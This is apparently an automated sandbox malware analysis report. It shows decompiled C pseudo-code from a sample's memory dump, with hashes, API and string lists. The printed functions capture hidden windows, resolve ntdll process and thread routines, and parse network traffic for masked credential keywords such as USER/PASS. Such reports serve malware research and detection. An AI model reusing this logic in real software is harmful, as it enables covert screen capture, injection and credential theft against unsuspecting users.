Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffda4d108ab09deda2d5248456dac95ae5461355034e1ac7a317b5d69001527e
Instruction ID: a9bfc3ec5368b9f306968287032fb7bf720b190d35a9c7e08416f7b3e45339f6
Opcode Fuzzy Hash: ffda4d108ab09deda2d5248456dac95ae5461355034e1ac7a317b5d69001527e
Instruction Fuzzy Hash: 4F21CF323204018BD318DF39EC95A5A33E2F789318B99457DD115CB2A2DA39E813CB88

Uniqueness

Uniqueness Score: -1.00%

Function 004196D9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction ID: 899eba08c6eaa69b3cd4829a85d04686de959d92ea195e5a10e4ce9b666544e8
Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction Fuzzy Hash: 8CE0867A7411158BD755CE15E4A0D87B7A6FBD8330B1286A5C81587309C938EDC3C9E5

Uniqueness

Uniqueness Score: -1.00%

Function 00416025 Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00416025(RECT* __eax, void* __ecx, signed int __edx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, signed int _a15) {
				char _v9;
				signed int _v10;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				void* _v68;
				signed int _v72;
				int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				struct HDC__* _v96;
				struct HWND__* _v100;
				void _v104;
				intOrPtr _v140;
				intOrPtr _v156;
				struct tagWINDOWINFO _v164;
				signed int _t128;
				signed int _t135;
				void* _t140;
				void* _t146;
				signed int _t164;
				intOrPtr _t191;
				long _t192;
				intOrPtr _t195;
				long _t196;
				long _t210;
				long _t211;
				long _t212;
				long _t213;
				signed int _t214;
				signed int _t215;
				RECT* _t216;
				struct HDC__* _t217;
				struct HDC__* _t221;

				_t214 = __edx;
				_t216 = __eax;
				_t128 = E0041B33C(_a8) & 0x0000ffff;
				_v16 = _t128;
				if((_t128 & 0x00000001) == 0) {
					if(_t128 == 0) {
						_v16 = 2;
						_t128 = _v16;
					}
					if(_a12 != 0 && (_t128 & 0x00000002) != 0) {
						_v16 = _t128 & 0x0000fffd | 0x00000008;
					}
					_v24 = 0;
					_v20 = 0;
					_v28 = 0;
					_v32 = 0;
					_v164.cbSize = 0x3c;
					if(GetWindowInfo(_a8,  &_v164) != 0) {
						_t215 = _t214 & 0xffffff00 | IntersectRect( &_v64,  &(_v164.rcWindow), _t216) != 0x00000000;
						_v10 = _t215;
						if(_t215 != 0) {
							_t212 = _t216->top;
							_t195 = _v156;
							if(_t195 < _t212) {
								_v20 = _t195 - _t212;
							}
							_t213 = _t216->left;
							_t196 = _v164.rcWindow.left;
							if(_t196 < _t213) {
								_v24 = _t196 - _t213;
							}
						}
						_t135 = _v16 & 0x00000002;
						_v72 = _t135;
						if(_t135 == 0) {
							_a15 = _t215;
						} else {
							if((_v164.dwStyle & 0x20000000) == 0) {
								_a15 = IntersectRect( &_v48,  &(_v164.rcClient), _t216) != 0;
								if(_a15 != 0) {
									_t210 = _t216->top;
									_t191 = _v140;
									if(_t191 < _t210) {
										_v32 = _t191 - _t210;
									}
									_t211 = _t216->left;
									_t192 = _v164.rcClient.left;
									if(_t192 < _t211) {
										_v28 = _t192 - _t211;
									}
								}
							} else {
								_a15 = 0;
							}
						}
						if(_v10 != 0 || _a15 != 0) {
							_t217 = GetDC(0);
							if(_t217 == 0) {
								goto L8;
							}
							_t221 = CreateCompatibleDC(_t217);
							ReleaseDC(0, _t217);
							if(_t221 == 0) {
								goto L8;
							}
							_t218 = _a4;
							_t140 = SelectObject(_t221,  *(_a4 + 0x1c));
							_v68 = _t140;
							if(_t140 != 0) {
								_v9 = 1;
								if(_v72 == 0) {
									if((_v16 & 0x00000004) == 0) {
										if((_v16 & 0x00000008) == 0) {
											L56:
											SelectObject(_t221, _v68);
											DeleteDC(_t221);
											return _v9;
										}
										if(_v24 != 0 || _v20 != 0) {
											SetViewportOrgEx(_t221, _v24, _v20, 0);
										}
										_t146 = E00415F45(_t218,  &_v64, 0);
										__imp__PrintWindow(_a8, _t221, 0);
										if(_t146 != 0) {
											L55:
											E00415F45(_t218,  &_v64, 1);
										} else {
											_v9 = 0;
										}
										goto L56;
									}
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E00415F45(_t218,  &_v64, 0);
									DefWindowProcW(_a8, 0x317, _t221, 0xe);
									goto L55;
								}
								_v100 = _a8;
								_v96 = _t221;
								_v84 = _v48.right - _v48.left;
								_v76 = 1;
								_v80 = _v48.bottom - _v48.top;
								_v92 = 0;
								_v88 = 0;
								TlsSetValue( *0x421eac,  &_v104);
								if(_v10 == 1 && EqualRect( &_v48,  &_v64) == 0) {
									_v16 = SaveDC(_t221);
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E00415F45(_a4,  &_v64, 0);
									_v104 = 0;
									SendMessageW(_a8, 0x85, 1, 0);
									if(_v104 == 0) {
										DefWindowProcW(_a8, 0x317, _t221, 2);
									}
									E00415F45(_a4,  &_v64, 1);
									RestoreDC(_t221, _v16);
								}
								if(_a15 != 1) {
									L49:
									TlsSetValue( *0x421eac, 0);
									goto L56;
								} else {
									if(_v28 != 0) {
										L41:
										_a15 = 1;
										L42:
										_v16 = SaveDC(_t221);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										E00415F45(_a4,  &_v48, 0);
										_t164 = SendMessageW(_a8, 0x14, _t221, 0);
										asm("sbb eax, eax");
										_v76 =  ~_t164 + 1;
										RestoreDC(_t221, _v16);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										_v104 = 0;
										SendMessageW(_a8, 0xf, 0, 0);
										if(_v104 == 0) {
											DefWindowProcW(_a8, 0x317, _t221, 4);
										}
										E00415F45(_a4,  &_v48, 1);
										goto L49;
									}
									_a15 = 0;
									if(_v32 == 0) {
										goto L42;
									}
									goto L41;
								}
							}
							DeleteDC(_t221);
							goto L8;
						} else {
							goto L1;
						}
					}
					L8:
					return 0;
				}
				L1:
				return 1;
			}

0x00416025
0x00416034
0x0041603b
0x0041603e
0x00416043
0x00416051
0x00416053
0x0041605a
0x0041605a
0x00416060
0x0041606e
0x0041606e
0x0041607b
0x0041607e
0x00416081
0x00416084
0x00416087
0x00416099
0x004160b8
0x004160bb
0x004160c0
0x004160c2
0x004160c5
0x004160cd
0x004160d1
0x004160d1
0x004160d4
0x004160d6
0x004160de
0x004160e2
0x004160e2
0x004160de
0x004160e8
0x004160eb
0x004160ee
0x0041613c
0x004160f0
0x004160f7
0x0041610e
0x00416115
0x00416117
0x0041611a
0x00416122
0x00416126
0x00416126
0x00416129
0x0041612b
0x00416133
0x00416137
0x00416137
0x00416133
0x004160f9
0x004160f9
0x004160f9
0x004160f7
0x00416142
0x00416154
0x00416158
0x00000000
0x00000000
0x00416167
0x00416169
0x00416171
0x00000000
0x00000000
0x00416177
0x0041617e
0x00416184
0x00416189
0x00416197
0x0041619f
0x0041631a
0x0041637b
0x0041635c
0x00416360
0x00416367
0x00000000
0x0041636d
0x00416380
0x0041638f
0x0041638f
0x0041639b
0x004163a5
0x004163ad
0x00416350
0x00416357
0x004163af
0x004163af
0x004163af
0x00000000
0x004163ad
0x0041631f
0x0041632e
0x0041632e
0x0041633a
0x0041634a
0x00000000
0x0041634a
0x004161a8
0x004161b1
0x004161b4
0x004161bd
0x004161c4
0x004161d1
0x004161d4
0x004161d7
0x004161e7
0x00416202
0x00416208
0x00416217
0x00416217
0x00416224
0x00416234
0x00416237
0x0041623c
0x00416249
0x00416249
0x00416257
0x00416260
0x00416260
0x0041626a
0x00416307
0x0041630e
0x00000000
0x00416270
0x00416273
0x0041627d
0x0041627d
0x00416281
0x00416288
0x0041628e
0x00416298
0x00416298
0x004162a5
0x004162b1
0x004162b8
0x004162bc
0x004162bf
0x004162c8
0x004162d2
0x004162d2
0x004162df
0x004162e2
0x004162e7
0x004162f4
0x004162f4
0x00416302
0x00000000
0x00416302
0x00416275
0x0041627b
0x00000000
0x00000000
0x00000000
0x0041627b
0x0041626a
0x0041618c
0x00000000
0x00000000
0x00000000
0x00000000
0x00416142
0x0041609b
0x00000000
0x0041609b
0x00416045
0x00000000

APIs

Part of subcall function 0041B33C: GetClassNameW.USER32 ref: 0041B357

GetWindowInfo.USER32 ref: 00416091
SelectObject.GDI32(00000000,?), ref: 00416360
DeleteDC.GDI32(00000000), ref: 00416367
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0041638F
PrintWindow.USER32(00000008,00000000,00000000), ref: 004163A5

Strings

<, xrefs: 00416087

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Window$ClassDeleteInfoNameObjectPrintSelectViewport
String ID: <
API String ID: 3458064076-4251816714
Opcode ID: 7fdf48bd5224103e3848e47938e3d794479bfae010cd21320c062b764fde4434
Instruction ID: b9bbf083107bd76ea5f95e09545047758022b840769bf64a63b07187b1a3db88
Opcode Fuzzy Hash: 7fdf48bd5224103e3848e47938e3d794479bfae010cd21320c062b764fde4434
Instruction Fuzzy Hash: A0C18E71D00249EFDF11DFA4CD88AEEBFB9AF09300F04806AF955A3220D7398A85DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00419713 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00419713(void* __edx, signed int _a4) {
				char _v24;
				void* __edi;
				void* __esi;
				void* _t6;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t19;
				struct HINSTANCE__* _t20;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				WCHAR* _t30;

				_t26 = __edx;
				_t27 = E004196D9();
				 *0x421880 = _t27;
				if(_t27 != 0) {
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) != 0) {
						_t6 = E00419611(_t25, _t26, _t27, "GetProcAddress");
						__eflags = E0040D130(_t25,  *0x42187c, E00419611(_t25, _t26, _t27, "LoadLibraryA"), _t6);
					} else {
						_t20 = GetModuleHandleW(0);
						 *0x42187c = _t20;
						__eflags = _t20;
					}
					if(__eflags != 0) {
						_t30 =  &_v24;
						E00412F05(0xc2, _t30);
						_t12 = GetModuleHandleW(_t30);
						 *0x421884 = _t12;
						__eflags = _t12;
						if(_t12 == 0) {
							L14:
							_t13 = 0;
							__eflags = 0;
							L15:
							goto L16;
						}
						 *0x421888 = GetProcAddress(_t12, "NtCreateThread");
						 *0x42188c = GetProcAddress( *0x421884, "NtCreateUserProcess");
						 *0x421890 = GetProcAddress( *0x421884, "NtQueryInformationProcess");
						 *0x421894 = GetProcAddress( *0x421884, "RtlUserThreadStart");
						 *0x421898 = GetProcAddress( *0x421884, "LdrLoadDll");
						_t19 = GetProcAddress( *0x421884, "LdrGetDllHandle");
						 *0x42189c = _t19;
						__eflags =  *0x421888;
						if( *0x421888 != 0) {
							L10:
							__eflags =  *0x421890;
							if( *0x421890 == 0) {
								goto L14;
							}
							__eflags =  *0x421898;
							if( *0x421898 == 0) {
								goto L14;
							}
							__eflags = _t19;
							if(_t19 == 0) {
								goto L14;
							}
							_t13 = 1;
							goto L15;
						}
						__eflags =  *0x42188c;
						if( *0x42188c == 0) {
							goto L14;
						}
						goto L10;
					} else {
						_t13 = 0;
						L16:
						return _t13;
					}
				}
				return 0;
			}

0x00419713
0x0041971f
0x00419721
0x00419729
0x00419732
0x0041973d
0x00419751
0x0041976d
0x0041973f
0x00419741
0x00419743
0x00419748
0x00419748
0x0041976f
0x00419779
0x00419781
0x00419789
0x0041978d
0x00419792
0x00419794
0x0041982f
0x0041982f
0x0041982f
0x00419831
0x00000000
0x00419831
0x004197b3
0x004197c5
0x004197d7
0x004197e9
0x004197fb
0x00419800
0x00419802
0x00419807
0x0041980d
0x00419817
0x00419817
0x0041981d
0x00000000
0x00000000
0x0041981f
0x00419825
0x00000000
0x00000000
0x00419827
0x00419829
0x00000000
0x00000000
0x0041982b
0x00000000
0x0041982b
0x0041980f
0x00419815
0x00000000
0x00000000
0x00000000
0x00419771
0x00419771
0x00419832
0x00000000
0x00419832
0x0041976f
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00419741

Strings

NtCreateUserProcess, xrefs: 004197A8
RtlUserThreadStart, xrefs: 004197CC
LoadLibraryA, xrefs: 00419757
NtCreateThread, xrefs: 004197A0
NtQueryInformationProcess, xrefs: 004197BA
LdrGetDllHandle, xrefs: 004197F0
GetProcAddress, xrefs: 0041974C
LdrLoadDll, xrefs: 004197DE

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: HandleModule
String ID: GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
API String ID: 4139908857-305303173
Opcode ID: b31155e60ccfb7555f46c47b1e3e159438d45b066cf278437f4755ae9662549d
Instruction ID: 7f6195457b38049318c78caf13f107dfd4500afd61162aaf5e234e86c8fba85f
Opcode Fuzzy Hash: b31155e60ccfb7555f46c47b1e3e159438d45b066cf278437f4755ae9662549d
Instruction Fuzzy Hash: CA21B6B1A00308AACB21BF75AD95AE63FD4A7957807650037E604A32B1D7398882DE5D

Uniqueness

Uniqueness Score: -1.00%

Function 00407322 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00407322(void* __eax, signed int* __ecx, intOrPtr _a4) {
				char _v536;
				char _v652;
				char _v664;
				char _v696;
				char _v700;
				char _v701;
				char _v708;
				void* __esi;
				char* _t36;
				char* _t45;
				intOrPtr _t46;
				void* _t56;
				void* _t58;
				intOrPtr _t59;
				signed int _t60;
				signed int _t62;
				void* _t63;
				signed int* _t73;
				intOrPtr _t75;
				signed int _t77;
				signed char _t78;
				signed int* _t81;
				signed int _t82;
				intOrPtr _t83;
				intOrPtr _t86;
				void* _t87;
				intOrPtr _t88;
				void* _t90;
				char* _t95;
				intOrPtr* _t96;

				_t90 = __eax;
				_t73 = __ecx;
				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
					L51:
					_t36 = 0;
					__eflags = 0;
				} else {
					if(__eax <= 6) {
						L24:
						__eflags = _t90 - 1;
						if(_t90 <= 1) {
							goto L51;
						} else {
							EnterCriticalSection(0x4203ec);
							_t86 = E00407216(_a4);
							__eflags = _t86;
							if(_t86 != 0) {
								__eflags =  *((intOrPtr*)(_t86 + 4));
								if( *((intOrPtr*)(_t86 + 4)) == 0) {
									L48:
									_push(0);
									goto L49;
								} else {
									__eflags =  *((intOrPtr*)(_t86 + 8));
									if( *((intOrPtr*)(_t86 + 8)) == 0) {
										goto L48;
									} else {
										__eflags = _t90 - 3;
										if(_t90 < 3) {
											L33:
											__eflags = _t90 - 4;
											if(_t90 >= 4) {
												_t77 =  *_t73 ^ 0x02000800;
												__eflags = _t77 - 0x47505154;
												if(_t77 == 0x47505154) {
													goto L37;
												} else {
													__eflags = _t77 - 0x56414d46;
													if(_t77 == 0x56414d46) {
														goto L37;
													} else {
														__eflags = _t77 - 0x54534950;
														if(_t77 != 0x54534950) {
															__eflags = _t77 - 0x56415c53;
															if(_t77 == 0x56415c53) {
																L40:
																_push(2);
																_t78 = 0x65;
																_pop(1);
																goto L41;
															} else {
																__eflags = _t77 - 0x5653414c;
																if(_t77 == 0x5653414c) {
																	goto L40;
																}
															}
														} else {
															goto L37;
														}
													}
												}
											}
										} else {
											_t60 =  *_t73;
											__eflags = _t60 - 0x43;
											if(_t60 == 0x43) {
												L31:
												__eflags = _t73[0] - 0x57;
												if(_t73[0] != 0x57) {
													goto L33;
												} else {
													__eflags = _t73[0] - 0x44;
													if(_t73[0] == 0x44) {
														L37:
														_t78 = 0x64;
														L41:
														E00412F05(1,  &_v696);
														_t45 =  &_v652;
														_v700 = 0x80;
														__imp__#5(_a4, _t45,  &_v700);
														__eflags = _t45;
														if(_t45 == 0) {
															_t80 =  &_v664;
															_t46 = E0040BB32( &_v664);
															__eflags = _t46;
															if(_t46 == 0) {
																__eflags = _t78 - 0x65;
																if(_t78 == 0x65) {
																	L46:
																	E0040BAE9( &_v664, _t80,  &_v536);
																	__eflags = 0;
																	E00412F05(0,  &_v696);
																	_push( &_v536);
																	_push( *((intOrPtr*)(_t86 + 8)));
																	_push( *((intOrPtr*)(_t86 + 4)));
																	E00413AE4(_t80, _t82, __eflags, _t78 & 0x000000ff, 0, 0,  &_v696,  &_v708);
																} else {
																	__eflags = _t78 - 0x64;
																	if(_t78 == 0x64) {
																		_t95 =  &_v696;
																		_t56 = 3;
																		E00412F05(_t56, _t95);
																		_push( *((intOrPtr*)(_t86 + 4)));
																		_t82 = _t82 | 0xffffffff;
																		_t58 = 9;
																		_t80 = _t95;
																		_t59 = E004093AE(_t58, _t95, _t82);
																		__eflags = _t59;
																		if(_t59 != 0) {
																			goto L46;
																		}
																	}
																}
															}
														}
														_push(0);
														L49:
														E004072B7(_t86);
													} else {
														goto L33;
													}
												}
											} else {
												__eflags = _t60 - 0x50;
												if(_t60 != 0x50) {
													goto L33;
												} else {
													goto L31;
												}
											}
										}
									}
								}
							}
							_t75 = 0;
							goto L23;
						}
					} else {
						_t62 =  *__ecx ^ 0x02000800;
						if(_t62 == 0x50455b55 || _t62 == 0x51534950) {
							if(_t73[1] != 0x20) {
								goto L24;
							} else {
								_t87 = _t90 - 5;
								_t63 = 0;
								_t81 =  &(_t73[1]);
								if(_t87 <= 0) {
									goto L51;
								} else {
									while(1) {
										_t83 =  *((intOrPtr*)(_t63 + _t81));
										if(_t83 == 0xd || _t83 == 0xa) {
											break;
										}
										if(_t83 < 0x20) {
											goto L51;
										} else {
											_t63 = _t63 + 1;
											if(_t63 < _t87) {
												continue;
											} else {
												break;
											}
										}
										goto L52;
									}
									if(_t63 == 0 || _t63 == _t87) {
										goto L51;
									} else {
										_t88 = E004088D2(_t63, 0xfde9, _t81);
										if(_t88 == 0) {
											goto L51;
										} else {
											_v701 = 0;
											EnterCriticalSection(0x4203ec);
											_t96 = E00407216(_a4);
											if(_t96 != 0) {
												L18:
												__eflags =  *_t73 - 0x55;
												_v701 = 1;
												if( *_t73 != 0x55) {
													E0040868F( *((intOrPtr*)(_t96 + 8)));
													 *((intOrPtr*)(_t96 + 8)) = _t88;
												} else {
													E004072B7(_t96, 1);
													 *((intOrPtr*)(_t96 + 4)) = _t88;
												}
												 *_t96 = _a4;
											} else {
												_t96 = E0040724F(_a4);
												if(_t96 != 0) {
													goto L18;
												} else {
													E0040868F(_t88);
												}
											}
											_t75 = _v701;
											L23:
											LeaveCriticalSection(0x4203ec);
											_t36 = _t75;
										}
									}
								}
							}
						} else {
							goto L24;
						}
					}
				}
				L52:
				return _t36;
			}

0x00407335
0x00407337
0x00407339
0x00407592
0x00407592
0x00407592
0x00407353
0x00407356
0x00407441
0x00407441
0x00407444
0x00000000
0x0040744a
0x0040744f
0x0040745d
0x00407461
0x00407463
0x00407469
0x0040746c
0x00407583
0x00407583
0x00000000
0x00407472
0x00407472
0x00407475
0x00000000
0x0040747b
0x0040747b
0x0040747e
0x00407496
0x00407496
0x00407499
0x004074a1
0x004074a7
0x004074ad
0x00000000
0x004074af
0x004074af
0x004074b5
0x00000000
0x004074b7
0x004074b7
0x004074bd
0x004074c6
0x004074cc
0x004074da
0x004074da
0x004074dc
0x004074de
0x00000000
0x004074ce
0x004074ce
0x004074d4
0x00000000
0x00000000
0x004074d4
0x00000000
0x00000000
0x00000000
0x004074bd
0x004074b5
0x004074ad
0x00407480
0x00407480
0x00407482
0x00407484
0x0040748a
0x0040748a
0x0040748e
0x00000000
0x00407490
0x00407490
0x00407494
0x004074bf
0x004074c1
0x004074df
0x004074e3
0x004074ed
0x004074f5
0x004074fd
0x00407503
0x00407505
0x00407507
0x0040750b
0x00407510
0x00407512
0x00407514
0x00407517
0x0040753e
0x00407549
0x00407552
0x00407554
0x00407560
0x00407561
0x00407568
0x00407577
0x00407519
0x00407519
0x0040751c
0x00407520
0x00407524
0x00407525
0x0040752a
0x0040752d
0x00407532
0x00407533
0x00407535
0x0040753a
0x0040753c
0x00000000
0x00000000
0x0040753c
0x0040751c
0x00407517
0x00407512
0x0040757f
0x00407584
0x00407586
0x00000000
0x00000000
0x00000000
0x00407494
0x00407486
0x00407486
0x00407488
0x00000000
0x00000000
0x00000000
0x00000000
0x00407488
0x00407484
0x0040747e
0x00407475
0x0040746c
0x0040758b
0x00000000
0x0040758b
0x0040735c
0x0040735e
0x00407368
0x00407379
0x00000000
0x0040737f
0x0040737f
0x00407382
0x00407384
0x00407389
0x00000000
0x0040738f
0x0040738f
0x0040738f
0x00407395
0x00000000
0x00000000
0x0040739f
0x00000000
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00000000
0x00000000
0x004073a8
0x00000000
0x0040739f
0x004073ac
0x00000000
0x004073ba
0x004073c5
0x004073c9
0x00000000
0x004073cf
0x004073d4
0x004073d9
0x004073e7
0x004073eb
0x00407403
0x00407403
0x00407406
0x0040740b
0x0040741e
0x00407423
0x0040740d
0x00407411
0x00407416
0x00407416
0x00407429
0x004073ed
0x004073f5
0x004073f9
0x00000000
0x004073fb
0x004073fc
0x004073fc
0x004073f9
0x0040742b
0x0040742f
0x00407434
0x0040743a
0x0040743a
0x004073c9
0x004073ac
0x00407389
0x00000000
0x00000000
0x00000000
0x00407368
0x00407356
0x00407594
0x0040759a

APIs

EnterCriticalSection.KERNEL32(004203EC,0000FDE9,?), ref: 004073D9
LeaveCriticalSection.KERNEL32(004203EC,?,000000FF), ref: 00407434
EnterCriticalSection.KERNEL32(004203EC), ref: 0040744F
getpeername.WS2_32 ref: 004074FD

Strings

LASV, xrefs: 004074CE
U[EP, xrefs: 00407363
, xrefs: 00407375
FMAV, xrefs: 004074AF
TQPG, xrefs: 004074A7
PISQ, xrefs: 0040736A
U, xrefs: 00407403
S\AV, xrefs: 004074C6
D, xrefs: 00407490
W, xrefs: 0040748A
PIST, xrefs: 004074B7

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CriticalSection$Enter$Leavegetpeername
String ID: $D$FMAV$LASV$PISQ$PIST$S\AV$TQPG$U$U[EP$W
API String ID: 1099368488-2747057115
Opcode ID: 5cae35ba6a36cd1a3e5e02b3cec8124e4d70c085fb05a1c6e3fe42edda4e30b4
Instruction ID: 66ad812d1d8027ac0f9cdbe4e7e5c7e82599e61e10e673ad08ec2266ba7f127d
Opcode Fuzzy Hash: 5cae35ba6a36cd1a3e5e02b3cec8124e4d70c085fb05a1c6e3fe42edda4e30b4
Instruction Fuzzy Hash: DF512631D0C241AADF319A648C85BAF7B95AB45300F14853BE984B72D2D63DAC45D38F

Uniqueness

Uniqueness Score: -1.00%

Function 0041B3A3 Relevance: 25.7, APIs: 17, Instructions: 204
filewindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041B3A3(void* __ecx, void* __edx, void** __esi, struct HDC__* _a4) {
				char _v9;
				struct HDC__* _v16;
				char _v20;
				short _v128;
				void* _v138;
				char _v616;
				char _v1345;
				char _v1408;
				long _t61;
				void* _t65;
				void* _t70;
				void* _t74;
				void* _t78;
				void* _t79;
				struct HDC__* _t81;
				int _t84;
				void* _t86;
				signed char _t89;
				void* _t91;
				void* _t106;
				struct HDC__* _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t119;
				void** _t123;

				_t123 = __esi;
				_t119 = __edx;
				E00408730(__esi, 0x18c);
				_t61 = TlsAlloc();
				__esi[1] = _t61;
				if(_t61 != 0xffffffff) {
					E00419DA0(0x84889911,  &_v128, 0);
					_t65 = RegisterWindowMessageW( &_v128);
					__esi[2] = _t65;
					__eflags = _t65;
					if(_t65 == 0) {
						goto L1;
					}
					E00419DA0(0x84889912,  &_v128, 1);
					_t70 = CreateEventW(0x4218a0, 1, 0,  &_v128);
					__esi[3] = _t70;
					__eflags = _t70;
					if(_t70 == 0) {
						goto L1;
					}
					E00419DA0(0x18782822,  &_v128, 1);
					_t74 = CreateMutexW(0x4218a0, 0,  &_v128);
					__esi[5] = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L1;
					}
					E00419DA0(0x9878a222,  &_v128, 1);
					_t78 = CreateFileMappingW(0, 0x4218a0, 4, 0, 0x3d09128,  &_v128);
					 *__esi = _t78;
					__eflags = _t78;
					if(_t78 == 0) {
						goto L1;
					}
					_t79 = MapViewOfFile(_t78, 2, 0, 0, 0);
					__eflags = _t79;
					if(_t79 == 0) {
						goto L1;
					}
					__esi[4] = _t79;
					__esi[6] = _t79 + 0x128;
					_v9 = 0;
					_t81 = GetDC(0);
					_v16 = _t81;
					__eflags = _t81;
					if(_t81 == 0) {
						L22:
						return _v9;
					}
					__esi[9] = 0;
					__esi[0xa] = 0;
					__esi[0xb] = GetDeviceCaps(_t81, 8);
					_t84 = GetDeviceCaps(_v16, 0xa);
					_t117 = __esi[0xb];
					__esi[0xc] = _t84;
					__eflags = CreateCompatibleBitmap(_v16, __esi[0xb], _t84);
					if(__eflags == 0) {
						_t86 = 0;
						__eflags = 0;
					} else {
						_t86 = E0040ECC1(_t117, _t119, __eflags, _v16,  &_v20,  &(__esi[8]), 0, 0, _t85);
					}
					_t123[7] = _t86;
					ReleaseDC(0, _v16);
					__eflags = _t123[7];
					if(_t123[7] != 0) {
						_t118 = _v20;
						_t89 =  *(_v20 + 0xe) >> 3;
						_t123[0xe] = _t89;
						_t91 = (_t89 & 0x000000ff) * _t123[0xb];
						_t123[0xd] = _t91;
						__eflags = _t91 & 0x00000003;
						if((_t91 & 0x00000003) != 0) {
							_t91 = (_t91 & 0xfffffffc) + 4;
							__eflags = _t91;
						}
						_t123[0xd] = _t91;
						E0040868F(_t118);
						__eflags = _a4 - 1;
						_v9 = 1;
						if(_a4 != 1) {
							goto L22;
						}
						_v9 = 0;
						E0041A05C( &_v1408);
						E0041A08B(_t118,  &_v616);
						E004086CB( &(_t123[0xf]), 0x421ae0, 0x10);
						_t123[0x13] = _v138;
						E004086CB( &(_t123[0x14]),  &_v1345, 0x102);
						E00419DA0(0x1898b122,  &_v128, 1);
						_t106 = CreateMutexW(0x4218a0, 0,  &_v128);
						_t123[0x58] = _t106;
						__eflags = _t106;
						if(_t106 == 0) {
							goto L1;
						}
						_t107 = GetDC(0);
						_a4 = _t107;
						__eflags = _t107;
						if(_t107 != 0) {
							_t108 = CreateCompatibleDC(_t107);
							_t123[0x55] = _t108;
							__eflags = _t108;
							if(_t108 != 0) {
								_t110 = CreateCompatibleBitmap(_a4, 1, 1);
								_t123[0x57] = _t110;
								__eflags = _t110;
								if(_t110 != 0) {
									_t111 = SelectObject(_t123[0x55], _t110);
									_t123[0x56] = _t111;
									__eflags = _t111;
									if(_t111 != 0) {
										_v9 = 1;
									}
								}
							}
							ReleaseDC(0, _a4);
						}
					}
					goto L22;
				}
				L1:
				return 0;
			}

0x0041b3a3
0x0041b3a3
0x0041b3b4
0x0041b3b9
0x0041b3bf
0x0041b3c5
0x0041b3da
0x0041b3e3
0x0041b3e9
0x0041b3ec
0x0041b3ee
0x00000000
0x00000000
0x0041b3fb
0x0041b40d
0x0041b413
0x0041b416
0x0041b418
0x00000000
0x00000000
0x0041b425
0x0041b430
0x0041b436
0x0041b439
0x0041b43b
0x00000000
0x00000000
0x0041b448
0x0041b45b
0x0041b461
0x0041b463
0x0041b465
0x00000000
0x00000000
0x0041b471
0x0041b477
0x0041b479
0x00000000
0x00000000
0x0041b47f
0x0041b488
0x0041b48b
0x0041b48e
0x0041b494
0x0041b497
0x0041b499
0x0041b604
0x00000000
